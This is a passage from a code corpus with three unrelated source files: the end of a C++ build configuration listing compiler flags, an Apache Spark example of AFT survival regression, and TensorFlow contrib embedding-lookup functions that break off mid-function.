    "gnu": ["-O2", "-g", "-pedantic -Wall -Wextra -Wcast-align -Wcast-qual -Wctor-dtor-privacy -Wdisabled-optimization -Wformat=2 -Winit-self -Wmissing-declarations -Wmissing-include-dirs -Wold-style-cast -Woverloaded-virtual -Wredundant-decls -Wshadow -Wsign-conversion -Wsign-promo -Wstrict-overflow=5 -Wswitch-default -Wundef -Werror -Wno-unused", "-fsanitize=address"],
    "msvc": ["/O2", "/W4"],
    "clang": ["-O2", "-g", "-Werror -Weverything -Wno-c++98-compat -Wno-c++98-compat-pedantic", "-fsanitize=address"],
}

# Linker flags per toolchain.
ldflags = {
    "gnu": ["-fsanitize=address"],
    "msvc": [],
    "clang": ["-fsanitize=address"],
}

# Source files.
cxx_files = ["tester.cc"]
c_files = []


# You can register your own toolchain through register_toolchain function
def register_toolchain(ninja):
    """Hook for registering a custom toolchain; intentionally a no-op."""
    pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
An example demonstrating aft survival regression.
Run with:
bin/spark-submit examples/src/main/python/ml/aft_survival_regression.py
"""
from __future__ import print_function
# $example on$
from pyspark.ml.regression import AFTSurvivalRegression
from pyspark.ml.linalg import Vectors
# $example off$
from pyspark.sql import SparkSession
if __name__ == "__main__":
    # Create (or reuse) a SparkSession; the app name appears in the Spark UI.
    spark = SparkSession \
        .builder \
        .appName("AFTSurvivalRegressionExample") \
        .getOrCreate()

    # The $example on$/$example off$ markers delimit the snippet extracted
    # into the Spark documentation — keep code between them self-contained.
    # $example on$
    training = spark.createDataFrame([
        (1.218, 1.0, Vectors.dense(1.560, -0.605)),
        (2.949, 0.0, Vectors.dense(0.346, 2.158)),
        (3.627, 0.0, Vectors.dense(1.380, 0.231)),
        (0.273, 1.0, Vectors.dense(0.520, 1.151)),
        (4.199, 0.0, Vectors.dense(0.795, -0.226))], ["label", "censor", "features"])
    quantileProbabilities = [0.3, 0.6]
    aft = AFTSurvivalRegression(quantileProbabilities=quantileProbabilities,
                                quantilesCol="quantiles")
    model = aft.fit(training)

    # Print the coefficients, intercept and scale parameter for AFT survival regression
    print("Coefficients: " + str(model.coefficients))
    print("Intercept: " + str(model.intercept))
    print("Scale: " + str(model.scale))
    model.transform(training).show(truncate=False)
    # $example off$

    spark.stop()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Embedding functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.framework.python.framework import tensor_util as contrib_tensor_util
from tensorflow.contrib.layers.python.ops import sparse_feature_cross_op
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
__all__ = [
"safe_embedding_lookup_sparse", "scattered_embedding_lookup",
"scattered_embedding_lookup_sparse", "embedding_lookup_unique",
"embedding_lookup_sparse_with_distributed_aggregation"
]
def safe_embedding_lookup_sparse(embedding_weights,
                                 sparse_ids,
                                 sparse_weights=None,
                                 combiner=None,
                                 default_id=None,
                                 name=None,
                                 partition_strategy="div",
                                 max_norm=None):
  """Lookup embedding results, accounting for invalid IDs and empty features.

  The partitioned embedding in `embedding_weights` must all be the same shape
  except for the first dimension. The first dimension is allowed to vary as the
  vocabulary size is not necessarily a multiple of `P`. `embedding_weights`
  may be a `PartitionedVariable` as returned by using `tf.get_variable()` with a
  partitioner.

  Invalid IDs (< 0) are pruned from input IDs and weights, as well as any IDs
  with non-positive weight. For an entry with no features, the embedding vector
  for `default_id` is returned, or the 0-vector if `default_id` is not supplied.

  The ids and weights may be multi-dimensional. Embeddings are always aggregated
  along the last dimension.

  Args:
    embedding_weights: A list of `P` float tensors or values representing
      partitioned embedding tensors. Alternatively, a `PartitionedVariable`,
      created by partitioning along dimension 0. The total unpartitioned
      shape should be `[e_0, e_1, ..., e_m]`, where `e_0` represents the
      vocab size and `e_1, ..., e_m` are the embedding dimensions.
    sparse_ids: `SparseTensor` of shape `[d_0, d_1, ..., d_n]` containing the
      ids. `d_0` is typically batch size.
    sparse_weights: `SparseTensor` of same shape as `sparse_ids`, containing
      float weights corresponding to `sparse_ids`, or `None` if all weights
      are be assumed to be 1.0.
    combiner: A string specifying how to combine embedding results for each
      entry. Currently "mean", "sqrtn" and "sum" are supported, with "mean"
      the default.
    default_id: The id to use for an entry with no features.
    name: A name for this operation (optional).
    partition_strategy: A string specifying the partitioning strategy.
      Currently `"div"` and `"mod"` are supported. Default is `"div"`.
    max_norm: If not None, all embeddings are l2-normalized to max_norm before
      combining.

  Returns:
    Dense tensor of shape `[d_0, d_1, ..., d_{n-1}, e_1, ..., e_m]`.

  Raises:
    ValueError: if `embedding_weights` is empty.
  """
  if combiner is None:
    logging.warn("The default value of combiner will change from \"mean\" "
                 "to \"sqrtn\" after 2016/11/01.")
    combiner = "mean"
  if embedding_weights is None:
    raise ValueError("Missing embedding_weights %s." % embedding_weights)
  if isinstance(embedding_weights, variables.PartitionedVariable):
    embedding_weights = list(embedding_weights)  # get underlying Variables.
  if not isinstance(embedding_weights, list):
    embedding_weights = [embedding_weights]
  if len(embedding_weights) < 1:
    raise ValueError("Missing embedding_weights %s." % embedding_weights)

  dtype = sparse_weights.dtype if sparse_weights is not None else None
  # NOTE: a second PartitionedVariable -> list conversion used to live here;
  # it was dead code, since the branch above has already normalized
  # `embedding_weights` to a plain list.
  embedding_weights = [
      ops.convert_to_tensor(w, dtype=dtype) for w in embedding_weights
  ]
  contrib_tensor_util.assert_same_float_dtype(embedding_weights +
                                              [sparse_weights])

  with ops.name_scope(name, "embedding_lookup",
                      embedding_weights + [sparse_ids,
                                           sparse_weights]) as scope:
    # Reshape higher-rank sparse ids and weights to linear segment ids.
    original_shape = sparse_ids.dense_shape
    original_rank_dim = sparse_ids.dense_shape.get_shape()[0]
    original_rank = (
        array_ops.size(original_shape)
        if original_rank_dim.value is None
        else original_rank_dim.value)
    sparse_ids = sparse_ops.sparse_reshape(sparse_ids, [
        math_ops.reduce_prod(
            array_ops.slice(original_shape, [0], [original_rank - 1])),
        array_ops.gather(original_shape, original_rank - 1)])
    if sparse_weights is not None:
      sparse_weights = sparse_tensor.SparseTensor(
          sparse_ids.indices,
          sparse_weights.values, sparse_ids.dense_shape)

    # Prune invalid ids and weights.
    sparse_ids, sparse_weights = _prune_invalid_ids(sparse_ids, sparse_weights)

    # Fill in dummy values for empty features, if necessary.
    sparse_ids, is_row_empty = sparse_ops.sparse_fill_empty_rows(sparse_ids,
                                                                 default_id or
                                                                 0)
    if sparse_weights is not None:
      sparse_weights, _ = sparse_ops.sparse_fill_empty_rows(sparse_weights, 1.0)

    result = embedding_ops.embedding_lookup_sparse(
        embedding_weights,
        sparse_ids,
        sparse_weights,
        combiner=combiner,
        partition_strategy=partition_strategy,
        name=None if default_id is None else scope,
        max_norm=max_norm)

    if default_id is None:
      # Broadcast is_row_empty to the same shape as embedding_lookup_result,
      # for use in Select.
      is_row_empty = array_ops.tile(
          array_ops.reshape(is_row_empty, [-1, 1]),
          array_ops.stack([1, array_ops.shape(result)[1]]))

      # Zero out rows that had no features so they don't keep the dummy
      # id-0 embedding.
      result = array_ops.where(is_row_empty,
                               array_ops.zeros_like(result),
                               result,
                               name=scope)

    # Reshape back from linear ids back into higher-dimensional dense result.
    final_result = array_ops.reshape(
        result,
        array_ops.concat([
            array_ops.slice(
                math_ops.cast(original_shape, dtypes.int32), [0],
                [original_rank - 1]),
            array_ops.slice(array_ops.shape(result), [1], [-1])
        ], 0))
    final_result.set_shape(tensor_shape.unknown_shape(
        (original_rank_dim - 1).value).concatenate(result.get_shape()[1:]))
    return final_result
def _prune_invalid_ids(sparse_ids, sparse_weights):
  """Prune invalid IDs (< 0) from the input ids and weights."""
  keep = math_ops.greater_equal(sparse_ids.values, 0)
  if sparse_weights is not None:
    # Also drop entries whose weight is not strictly positive.
    keep = math_ops.logical_and(
        keep, math_ops.greater(sparse_weights.values, 0))
    sparse_weights = sparse_ops.sparse_retain(sparse_weights, keep)
  sparse_ids = sparse_ops.sparse_retain(sparse_ids, keep)
  return sparse_ids, sparse_weights
def scattered_embedding_lookup(params,
                               values,
                               dimension,
                               name=None,
                               hash_key=None):
  """Looks up embeddings using parameter hashing for each value in `values`.

  The i-th embedding component of a value v in `values` is found by retrieving
  the weight whose index is a fingerprint of the pair (v,i).

  The concept is explored as "feature hashing" for model compression in this
  paper: http://arxiv.org/pdf/1504.04788.pdf

  Feature hashing lets us compute an embedding without a pre-determined
  vocabulary and keep a fixed memory footprint even for very large feature
  spaces. Unlike shared out-of-vocabulary "hash buckets", each token's
  embedding is extremely likely to be unique; the cost is one hash per scalar
  of the embedding rather than one per token.

  If `params` is a list, it represents a partition of the embedding parameters.
  Each tensor in the list should have the same length, except for the first
  ones which may have an additional element. For instance 10 parameters can be
  partitioned in 4 tensors with length `[3, 3, 2, 2]`.

  Args:
    params: A `Tensor`, `list` of `Tensors`, or `PartitionedVariable`.
      Each tensor must be of rank 1 with fully-defined shape.
    values: `Tensor` of values to be embedded with shape `[d0, ..., dn]`.
    dimension: Embedding dimension.
    name: An optional name for this op.
    hash_key: Specify the hash_key that will be used by the `FingerprintCat64`
      function to combine the crosses fingerprints on SparseFeatureCrossOp
      (optional).

  Returns:
    A `Tensor` with shape `[d0, ..., dn, dimension]`.

  Raises:
    ValueError: if dimension is not positive or the partition size is invalid.
  """
  if dimension is None:
    raise ValueError("You must specify dimension.")
  # Delegate to the sampled variant with no candidate sampling, i.e. look up
  # every embedding dimension.
  return _sampled_scattered_embedding_lookup(
      params, values, dimension=dimension, sampled_candidates=None,
      hash_key=hash_key, name=name)
def _sampled_scattered_embedding_lookup(
    params, values, dimension=None, sampled_candidates=None, hash_key=None,
    name=None):
  """Looks up embeddings using parameter hashing for each value in `values`.
  This method looks up selected embedding dimensions if `sampled_candidates` is
  given, otherwise looks up all dimensions.
  The i-th embedding component of a value v in `values` is found by retrieving
  the weight whose index is a fingerprint of the pair (v,i).
  The concept is explored as "feature hashing" for model compression in this
  paper: http://arxiv.org/pdf/1504.04788.pdf
  Feature hashing has the pleasant effect of allowing us to compute an embedding
  without needing a pre-determined vocabulary, relieving some amount of process
  complexity. It also allows for us to maintain embeddings for possibly
  trillions of features with a fixed amount of memory.
  Note that this is superior to out-of-vocabulary shared "hash buckets" in that
  the embedding is extremely likely to be unique for each token as opposed to
  being shared across probably-colliding tokens. The price is that we must
  compute a hash once for each scalar in the token's embedding as opposed to
  once per token.
  If `params` is a list, it represents a partition of the embedding parameters.
  Each tensor in the list should have the same length, except for the first ones
  which may have an additional element. For instance 10 parameters can be
  partitioned in 4 tensors with length `[3, 3, 2, 2]`.
  Args:
    params: A `Tensor`, `list` of `Tensors`, or `PartitionedVariable`.
      Each tensor must be of rank 1 with fully-defined shape.
    values: `Tensor` of values to be embedded with shape `[d0, ..., dn]`.
    dimension: Embedding dimension. The user must specify either `dimension` or
      `sampled_candidates`.
    sampled_candidates: An optional `Tensor` of slice indices to keep along the
      final dimension with shape `[d0, ..., dn, N]`. If given, `dimension` is
      ignored. If `None`, looks up all candidates.
    hash_key: Specify the hash_key that will be used by the `FingerprintCat64`
      function to combine the crosses fingerprints on SparseFeatureCrossOp
      (optional).
    name: An optional name for this op.
  Returns:
    A `Tensor` with shape `[d0, ..., dn, dimension]`.
    If `sampled_candidates` is given, the output shape is `[d0, ..., dn, N]`
  Raises:
    ValueError: if dimension is not positive or the partition size is invalid.
  """
  if isinstance(params, variables.PartitionedVariable):
    params = list(params)
  if not isinstance(params, list):
    params = [params]
  with ops.name_scope(name, "scattered_embedding_lookup",
                      params + [dimension, values]):
    # Flatten the values
    values_shape = array_ops.shape(values)
    values = array_ops.reshape(values, [-1, 1])
    if sampled_candidates is None:
      # No candidates given: select every component [0, dimension) for each
      # flattened value.
      if dimension is None:
        raise ValueError(
            "You must specify either dimension or sampled_candidates.")
      if dimension <= 0:
        raise ValueError("Dimension must be >0. Given is %d" % dimension)
      sampled_candidates = array_ops.tile(array_ops.expand_dims(
          math_ops.range(0, dimension), 0), array_ops.shape(values))
    else:
      # Infer `dimension` from the trailing axis of sampled_candidates, and
      # assert (at graph-run time) that its leading shape matches `values`.
      dimension = array_ops.shape(sampled_candidates)[
          math_ops.subtract(array_ops.rank(sampled_candidates), 1)]
      sampled_candidates_shape = array_ops.shape(sampled_candidates)
      dimension_tensor = array_ops.reshape(dimension, shape=[1,])
      expected_shape = array_ops.concat([values_shape, dimension_tensor], 0)
      with ops.control_dependencies([control_flow_ops.Assert(
          math_ops.reduce_all(math_ops.equal(sampled_candidates_shape,
                                             expected_shape)),
          ["The shape of sampled_candidates: ", sampled_candidates_shape,
           " does not match the shape of values: ", values_shape])]):
        # Flatten sampled_candidates, same way as values are flattened.
        sampled_candidates = array_ops.reshape(sampled_candidates,
                                               [-1, dimension])
    # Validate that params forms an equal-length partition of a rank-1
    # parameter vector (leading pieces may hold one extra element).
    num_partitions = len(params)
    partition_sizes = []
    for p in range(num_partitions):
      shape = params[p].get_shape()
      shape.assert_has_rank(1)
      shape.assert_is_fully_defined()
      partition_sizes.append(shape[0].value)
    num_params = sum(partition_sizes)  # Total number of parameters.
    # Assert the size of each partition.
    for p in range(num_partitions):
      expected_size = (num_params - p - 1) // num_partitions + 1
      if partition_sizes[p] != expected_size:
        raise ValueError("Tensor %d in params has size %d, expected %d." %
                         (p, partition_sizes[p], expected_size))
    # With two values v1 and v2 and 3 dimensions, we will cross
    # [[0, 1, 2], [0, 1, 2]] with [[v1], [v2]].
    tensors_to_cross = [sampled_candidates, values]
    ids = sparse_feature_cross_op.sparse_feature_cross(
        tensors_to_cross, hashed_output=True, num_buckets=num_params,
        hash_key=hash_key)
    ids = sparse_ops.sparse_tensor_to_dense(ids)
    # No need to validate the indices since we have checked the params
    # dimensions and we know the largest id.
    result = embedding_ops.embedding_lookup(
        params, ids, partition_strategy="div")
    # Restore the original leading shape of `values`, with the embedding
    # dimension appended.
    return array_ops.reshape(result,
                             array_ops.concat([values_shape, [dimension]], 0))
def scattered_embedding_lookup_sparse(params,
                                      sparse_values,
                                      dimension,
                                      combiner=None,
                                      default_value=None,
                                      name=None,
                                      hash_key=None):
  """Looks up embeddings of a sparse feature using parameter hashing.

  See `tf.contrib.layers.scattered_embedding_lookup` for embedding with
  hashing. Empty rows of `sparse_values` are first filled with
  `default_value`, then each row's value embeddings are combined according
  to `combiner`.

  Args:
    params: A `Tensor`, `list` of `Tensors`, or `PartitionedVariable`.
      Each tensor must be of rank 1 with fully-defined shape.
    sparse_values: A 2-D `SparseTensor` containing the values to be embedded.
      Some rows may be empty.
    dimension: Embedding dimension
    combiner: A string specifying how to combine embedding results for each
      entry. Currently "mean", "sqrtn" and "sum" are supported, with "mean"
      the default.
    default_value: The value to use for an entry with no features.
    name: An optional name for this op.
    hash_key: Specify the hash_key that will be used by the `FingerprintCat64`
      function to combine the crosses fingerprints on SparseFeatureCrossOp
      (optional).

  Returns:
    Dense tensor with shape [N, dimension] with N the number of rows in
    sparse_values.

  Raises:
    TypeError: If sparse_values is not a SparseTensor.
    ValueError: If combiner is not one of {"mean", "sqrtn", "sum"}.
  """
  if combiner is None:
    logging.warn("The default value of combiner will change from \"mean\" "
                 "to \"sqrtn\" after 2016/11/01.")
    combiner = "mean"
  # Fail fast on a bad combiner before any graph ops are created, matching
  # the early validation in
  # embedding_lookup_sparse_with_distributed_aggregation.
  if combiner not in ("mean", "sqrtn", "sum"):
    raise ValueError("Combiner must be one of 'mean', 'sqrtn' or 'sum'.")
  if isinstance(params, variables.PartitionedVariable):
    params = list(params)
  if not isinstance(params, list):
    params = [params]
  if not isinstance(sparse_values, sparse_tensor.SparseTensor):
    raise TypeError("sparse_values must be SparseTensor")
  with ops.name_scope(name, "scattered_embedding_lookup_sparse",
                      params + [sparse_values]) as scope:
    # Fill in the empty rows.
    if default_value is None:
      # Random default values to reduce the risk of collision.
      if sparse_values.dtype == dtypes.string:
        default_value = "6ZxWzWOHxZ"
      else:
        default_value = 1288896567
    sparse_values, _ = sparse_ops.sparse_fill_empty_rows(
        sparse_values, default_value)
    # Row index of every value; used as the segment id when combining.
    segment_ids = sparse_values.indices[:, 0]
    if segment_ids.dtype != dtypes.int32:
      segment_ids = math_ops.cast(segment_ids, dtypes.int32)
    values = sparse_values.values
    # Embed each distinct value once; `idx` maps results back to positions.
    values, idx = array_ops.unique(values)
    embeddings = scattered_embedding_lookup(
        params, values, dimension, hash_key=hash_key)
    if combiner == "sum":
      embeddings = math_ops.sparse_segment_sum(embeddings, idx, segment_ids,
                                               name=scope)
    elif combiner == "mean":
      embeddings = math_ops.sparse_segment_mean(embeddings, idx, segment_ids,
                                                name=scope)
    else:  # "sqrtn", guaranteed by the validation above.
      embeddings = math_ops.sparse_segment_sqrt_n(embeddings, idx, segment_ids,
                                                  name=scope)
    return embeddings
def embedding_lookup_unique(params, ids, name=None):
  """Deduplicating wrapper around `embedding_ops.embedding_lookup`.

  Each distinct id is looked up exactly once, and the resulting rows are then
  scattered back to the positions of the original (possibly repeated) ids,
  which saves communication when `ids` contains duplicates. `ids` may be of
  any rank; the result has shape `ids.shape + params.shape[1:]`.

  Args:
    params: A list of tensors with the same shape and type, or a
      `PartitionedVariable`. Shape `[index, d1, d2, ...]`.
    ids: A one-dimensional `Tensor` with type `int32` or `int64` containing
      the ids to be looked up in `params`. Shape `[ids1, ids2, ...]`.
    name: A name for this operation (optional).

  Returns:
    A `Tensor` with the same type as the tensors in `params` and dimension of
    `[ids1, ids2, d1, d2, ...]`.

  Raises:
    ValueError: If `params` is empty.
  """
  with ops.name_scope(name, "EmbeddingLookupUnique", [params, ids]):
    ids = ops.convert_to_tensor(ids)
    ids_shape = array_ops.shape(ids)
    # Collapse ids to rank 1 so `unique` can deduplicate them.
    flat_ids = array_ops.reshape(
        ids, math_ops.reduce_prod(ids_shape, keep_dims=True))
    distinct_ids, remap = array_ops.unique(flat_ids)
    distinct_rows = embedding_ops.embedding_lookup(params, distinct_ids)
    # Scatter the deduplicated rows back to the original id positions.
    flat_result = array_ops.gather(distinct_rows, remap)
    result_shape = array_ops.concat(
        [ids_shape, array_ops.shape(distinct_rows)[1:]], 0)
    result = array_ops.reshape(flat_result, result_shape)
    # Propagate whatever static shape information is available.
    result.set_shape(ids.get_shape().concatenate(
        distinct_rows.get_shape()[1:]))
    return result
def _sampled_scattered_embedding_lookup_sparse(params,
                                               sp_values,
                                               dimension=None,
                                               sampled_candidates=None,
                                               hash_key=None,
                                               with_sign_hash=False,
                                               name=None):
  """Looks up embeddings using parameter hashing for sparse values.
  This method looks up selected embedding dimensions if `sampled_candidates` is
  given, otherwise looks up all dimensions.
  The i-th embedding component of a value v in `values` is found by retrieving
  the weight whose index is a fingerprint of the pair (v,i).
  The concept is explored as "feature hashing" for model compression in this
  paper: http://arxiv.org/pdf/1504.04788.pdf
  This is logically equivalent to:
  * Transforming `sp_values` (which has shape `[d0, d1]`) into a one-hot
    `Tensor` of shape `[d0, N]`.
  * Multiplying with a `Tensor` `h` of shape `[N, dimension]`, where
    `h(i, j) = params[hash(i, j)]`.
  Args:
    params: A float `Tensor` with rank 1 and fully-defined shape.
    sp_values: A 2D `SparseTensor` to be embedded with shape `[d0, d1]`.
    dimension: An int `Tensor` of the final dimension. The user needs to provide
      either `dimension` or `sampled_candidates`.
    sampled_candidates: An optional `Tensor` of column indices to keep along
      the final dimension with shape `[d0, N]`. If given, `dimension` is
      ignored. If `None`, looks up all candidates.
    hash_key: Specify the hash_key that will be used by the `FingerprintCat64`
      function to combine the crosses fingerprints on SparseFeatureCrossOp
      (optional).
    with_sign_hash: A `bool` indicating whether `h(i, j)` should be multiplied
      by `+1` or `-1`, where the value selected is determined by hashing
      `(i, j)`. This is often necessary to remove bias resulting from hash
      collisions.
    name: An optional name for this op.
  Returns:
    A `Tensor` of shape `[d0, dimension]`.
    If `sampled_candidates` is given, the output shape is `[d0, N]`.
  Raises:
    TypeError: If sp_values is not `SparseTensor`.
    ValueError: If both `dimension` and `sampled_candidates` are `None`.
  """
  if not isinstance(sp_values, sparse_tensor.SparseTensor):
    raise TypeError("sp_values must be SparseTensor")
  with ops.name_scope(
      name=name,
      default_name="sampled_scattered_embedding_lookup_sparse",
      values=[sp_values, params, dimension, sampled_candidates]) as name_scope:
    # Row index of each sparse value; also the segment id for the final sum.
    segment_ids = sp_values.indices[:, 0]
    if sampled_candidates is not None:
      # Tile sampled_candidates so there is one line corresponding to each
      # element in sp_values.values
      sampled_candidates = array_ops.gather(sampled_candidates, segment_ids)
    embeddings = _sampled_scattered_embedding_lookup(
        params, sp_values.values, dimension=dimension,
        sampled_candidates=sampled_candidates,
        hash_key=hash_key, name="values_lookup")
    if with_sign_hash:
      # Hash each (value, component) pair to -1./+1. and flip the sign of the
      # corresponding embedding component to debias hash collisions.
      signs = _sampled_scattered_embedding_lookup(
          array_ops.constant([-1., 1.]), sp_values.values, dimension=dimension,
          sampled_candidates=sampled_candidates, hash_key=hash_key,
          name="signs_lookup")
      embeddings = math_ops.multiply(signs, embeddings, name="signs_hash")
    if segment_ids.dtype != dtypes.int32:
      segment_ids = math_ops.cast(segment_ids, dtypes.int32)
    num_segments = array_ops.shape(sp_values)[0]
    # Sum the embeddings of all values that share a row of sp_values.
    return math_ops.unsorted_segment_sum(embeddings, segment_ids,
                                         num_segments=num_segments,
                                         name=name_scope)
def embedding_lookup_sparse_with_distributed_aggregation(
    params,
    sp_ids,
    sp_weights,
    partition_strategy="mod",
    name=None,
    combiner=None,
    max_norm=None):
  """Computes embeddings for the given ids and weights.
  Embeddings belonging to same param are aggregated on that device first. This
  op is intended to decrease data transmission and improve parallelism. See
  `tf.nn.embedding_lookup_sparse` for the functionality and example of this op.
  Args:
    params: A single tensor representing the complete embedding tensor,
      or a list of P tensors all of same shape except for the first dimension,
      representing sharded embedding tensors. Alternatively, a
      `PartitionedVariable`, created by partitioning along dimension 0. Each
      element must be appropriately sized for the given `partition_strategy`.
    sp_ids: N x M SparseTensor of int64 ids (typically from FeatureValueToId),
      where N is typically batch size and M is arbitrary.
    sp_weights: either a SparseTensor of float / double weights, or None to
      indicate all weights should be taken to be 1. If specified, sp_weights
      must have exactly the same shape and indices as sp_ids.
    partition_strategy: A string specifying the partitioning strategy, relevant
      if `len(params) > 1`. Currently `"div"` and `"mod"` are supported. Default
      is `"mod"`. See `tf.nn.embedding_lookup` for more details.
    name: Optional name for the op.
    combiner: A string specifying the reduction op. Currently "mean", "sqrtn"
      and "sum" are supported.
      "sum" computes the weighted sum of the embedding results for each row.
      "mean" is the weighted sum divided by the total weight.
      "sqrtn" is the weighted sum divided by the square root of the sum of the
      squares of the weights.
    max_norm: If not None, each embedding is normalized to have l2 norm equal
      to max_norm before combining.
  Returns:
    A dense tensor representing the combined embeddings for the
    sparse ids. For each row in the dense tensor represented by sp_ids, the op
    looks up the embeddings for all ids in that row, multiplies them by the
    corresponding weight, and combines these embeddings as specified.
  Raises:
    TypeError: If sp_ids is not a SparseTensor, or if sp_weights is neither
      None nor SparseTensor.
    ValueError: If combiner is not one of {"mean", "sqrtn", "sum"}.
  """
  if combiner is None:
    logging.warn("The default value of combiner will change from \"mean\" "
                 "to \"sqrtn\" after 2016/11/01.")
    combiner = "mean"
  if combiner not in ("mean", "sqrtn", "sum"):
    raise ValueError("combiner must be one of 'mean', 'sqrtn' or 'sum'")
  if isinstance(params, variables.PartitionedVariable):
    params = list(params)  # Iterate to get the underlying Variables.
  if not isinstance(params, list):
    params = [params]
  if not isinstance(sp_ids, sparse_tensor.SparseTensor):
    raise TypeError("sp_ids must be SparseTensor")
  ignore_weights = sp_weights is None
  if not ignore_weights:
    if not isinstance(sp_weights, sparse_tensor.SparseTensor):
      raise TypeError("sp_weights must be either None or SparseTensor")
    # Static-shape compatibility checks between sp_ids and sp_weights.
    sp_ids.values.get_shape().assert_is_compatible_with(
        sp_weights.values.get_shape())
    sp_ids.indices.get_shape().assert_is_compatible_with(
        sp_weights.indices.get_shape())
    sp_ids.dense_shape.get_shape().assert_is_compatible_with(
        sp_weights.dense_shape.get_shape())
    # TODO(yleon): Add enhanced node assertions to verify that sp_ids and
    # sp_weights have equal indices and shapes.
  with ops.name_scope(name, "embedding_lookup_sparse",
                      params + [sp_ids]) as name:
    # Row index of every id; used as the segment id for aggregation.
    segment_ids = sp_ids.indices[:, 0]
    if segment_ids.dtype != dtypes.int32:
      segment_ids = math_ops.cast(segment_ids, dtypes.int32)
    ids = sp_ids.values
    # Ids are deduplicated only in the unweighted case; in the weighted case
    # `idx` stays None and every id is looked up so ids align with weights.
    if ignore_weights:
      ids, idx = array_ops.unique(ids)
    else:
      idx = None
    weights = None if ignore_weights else sp_weights.values
    # The helper performs the sharded gather plus per-segment (weighted)
    # summation, aggregating on each shard's device.
    embeddings = _embedding_lookup_with_distributed_aggregation(
        params,
        ids,
        partition_strategy=partition_strategy,
        max_norm=max_norm,
        weights=weights,
        idx=idx,
        segment_ids=segment_ids)
    # Set weights to all one if ignore weights.
    if ignore_weights:
      weights = array_ops.fill([array_ops.shape(segment_ids)[0]], 1)
    if weights.dtype != embeddings.dtype:
      weights = math_ops.cast(weights, embeddings.dtype)
    # Reshape weights so they broadcast against the embedding dimensions.
    ones = array_ops.fill(
        array_ops.expand_dims(array_ops.rank(embeddings) - 1, 0), 1)
    bcast_weights_shape = array_ops.concat([array_ops.shape(weights), ones], 0)
    orig_weights_shape = weights.get_shape()
    weights = array_ops.reshape(weights, bcast_weights_shape)
    if embeddings.get_shape().ndims is not None:
      weights.set_shape(
          orig_weights_shape.concatenate(
              [1 for _ in range(embeddings.get_shape().ndims - 1)]))
    # `embeddings` already holds per-segment weighted sums; for "mean" and
    # "sqrtn" divide by the appropriate per-segment normalizer.
    if combiner == "mean":
      weight_sum = math_ops.segment_sum(weights, segment_ids)
      embeddings = math_ops.div(embeddings, weight_sum)
    elif combiner == "sqrtn":
      weights_squared = math_ops.pow(weights, 2)
      weight_sum = math_ops.segment_sum(weights_squared, segment_ids)
      weight_sum_sqrt = math_ops.sqrt(weight_sum)
      embeddings = math_ops.div(embeddings, weight_sum_sqrt)
    elif combiner != "sum":
      # Unreachable: combiner was validated above.
      assert False, "Unrecognized combiner"
    return embeddings
def _do_gather(params, ids, name=None):
  """Deals with doing gather differently for resource variables.

  `ResourceVariable`s are read with `sparse_read`; everything else falls back
  to a plain `array_ops.gather`.
  """
  if isinstance(params, resource_variable_ops.ResourceVariable):
    return params.sparse_read(ids, name=name)
  return array_ops.gather(params, ids, name=name)
def _embedding_lookup_with_distributed_aggregation(params,
                                                   ids,
                                                   partition_strategy="mod",
                                                   name=None,
                                                   max_norm=None,
                                                   weights=None,
                                                   idx=None,
                                                   segment_ids=None):
  """Lookup helper for embedding_lookup_sparse_with_distributed_aggregation.

  Gathers embeddings shard by shard and applies weighting (or deduplicated
  summation) colocated with each shard, so only partially aggregated results
  are combined at the end.

  Args:
    params: A tensor, list of tensors, or `PartitionedVariable` holding the
      embedding shards.
    ids: Ids to look up.
    partition_strategy: `"mod"` or `"div"`; how ids map to shards.
    name: Optional op name.
    max_norm: If not None, clip each gathered embedding to this l2 norm.
    weights: Optional per-id weights; None means unweighted.
    idx: Second output of `array_ops.unique(ids)`; used only when `weights`
      is None (see the caller).
    segment_ids: Segment (row) id for each entry, used for the segment sums.

  Returns:
    Per-segment sums of the (optionally weighted, optionally norm-clipped)
    embeddings for `ids`.

  Raises:
    ValueError: If `params` is empty or `partition_strategy` is unknown.
  """
  if params is None or params == []: # pylint: disable=g-explicit-bool-comparison
    raise ValueError("Need at least one param")
  if isinstance(params, variables.PartitionedVariable):
    params = list(params) # Iterate to get the underlying Variables.
  if not isinstance(params, list):
    params = [params]
  def maybe_normalize(x):
    # Clip each row of x (all axes except 0) to max_norm when requested.
    if max_norm is not None:
      if x.get_shape().ndims is not None:
        ndims = x.get_shape().ndims
      else:
        ndims = array_ops.size(array_ops.shape(x))
      return clip_ops.clip_by_norm(x, max_norm, axes=list(range(1, ndims)))
    return x
  with ops.name_scope(name, "embedding_lookup_with_distributed_aggregation",
                      params + [ids]) as name:
    np = len(params)  # Number of partitions (NOTE: shadows the common numpy alias).
    # Preserve the resource variable status to avoid accidental dense reads.
    if not any(
        isinstance(p, resource_variable_ops.ResourceVariable) for p in params):
